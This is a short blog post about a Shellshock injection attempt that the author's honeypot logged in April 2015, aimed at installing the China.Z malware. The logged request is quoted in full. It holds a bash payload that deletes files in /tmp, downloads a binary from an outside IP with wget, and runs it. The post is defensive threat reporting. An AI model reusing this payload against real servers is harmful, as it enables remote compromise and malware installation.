SendMeSpam: China.Z malware

Mittwoch, 15. April 2015

China.Z malware

On the 12th of April my Honeypot server received an attempt of a shellinjection attack.
Taret was to download and run the China.Z malware.

27.17.5.140 - - [12/Apr/2015:14:10:20 +0200] "GET / HTTP/1.1" 404 442 "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://61.160.212.172:911/java -O /tmp/China.Z-wxvm >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-wxvm >> /tmp/Run.sh;echo /tmp/China.Z-wxvm >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\"" "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://61.160.212.172:911/java -O /tmp/China.Z-wxvm >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-wxvm >> /tmp/Run.sh;echo /tmp/China.Z-wxvm >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\""

Today, the malware was not available for download anymore, so if you need additional information please go to Virustotal

The source address for this IP is located in China.

SendMeSpam

Mittwoch, 15. April 2015

China.Z malware

Keine Kommentare:

Kommentar veröffentlichen